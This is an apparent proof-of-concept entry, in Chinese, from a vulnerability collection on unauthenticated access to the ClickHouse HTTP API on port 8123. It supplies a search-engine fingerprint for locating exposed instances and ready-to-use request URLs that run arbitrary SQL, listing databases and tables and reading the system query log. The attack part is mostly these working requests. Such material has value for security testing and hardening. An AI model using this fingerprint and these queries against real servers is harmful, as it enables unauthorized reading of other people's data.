Awesome-POC/数据库漏洞/ClickHouse API 数据库接口未授权访问漏洞.md

# ClickHouse API 数据库接口未授权访问漏洞

## 漏洞描述

ClickHouse API 数据库接口存在未授权访问漏洞，攻击者通过漏洞可以执行任意SQL命令获取数据库数据

## 漏洞影响

```
ClickHouse
```

## 网络测绘

```
"ClickHouse" && body="ok"
```

## 漏洞复现

登录页面

![img](images/202202091258079.png)

执行SQL语句

![img](images/202202091258245.png)

```
http://your-ip:8123/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical
```

![img](images/202202091258274-16898396122771.png)

其他的SQL语句：

```
http://your-ip:8123/?query=SHOW%20DATABASES
```

```
http://your-ip:8123/?query=SELECT%20*%20FROM%20system.tables
```